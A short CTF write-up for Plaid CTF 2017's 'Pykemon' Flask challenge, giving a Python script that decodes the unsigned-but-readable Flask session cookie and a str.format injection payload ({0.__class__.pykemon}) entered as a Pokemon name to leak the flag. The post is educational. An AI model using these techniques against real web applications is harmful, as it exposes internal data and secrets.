Plaid CTF 2017: Pykemon Writeup

Solved by HRJ

The challenge was great, it had two ways of solving it. We were given website in which we can catch a Pokemon,  rename a Pokemon, see all our Pokemon and buy Pokeball’s. These were the functionalities.


We were also given the source code of the website which was written using the flask (Link).  There were many Pokemon including FLAG was a Pokemon we can understand that by seeing the write-up. The flag was stored in the description of Pokemon ‘FLAG’.

The first way of solving the challenge, by decoding the flask session cookie. We will first base64 decode the cookie and then zlib decompress it.

import zlib
from itsdangerous import base64_decode

cookie ="<session cookie>"

cookie = cookie[1:]
cookie = zlib.decompress(base64_decode(cookie.split(".")[0]))
print cookie

By seeing the source code we can get the HP of the FLAG. The above script will return the description of all the Pokemon. We know the ‘pid’ of the FLAG IS ‘FLAG90’. We will grep the pid and find the flag.


Next way is exploiting the format function in python (Link).

I didn’t have any idea regarding this vulnerability, it was great learning for me. We can control the input which is passed while renaming a Pokemon and the input is directly passed to the format function without any validation. Whoever controls the format string can access potentially internal attributes of objects.

>>> ‘class of {0} is {0.__class__}’.format(42)
“class of 42 is <class ‘int’>”

By accessing the list pykemon in Pykemon class you can get the flag, for that you have to pass the name as : {0.__class__.pykemon}


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Create a free website or blog at

Up ↑

%d bloggers like this: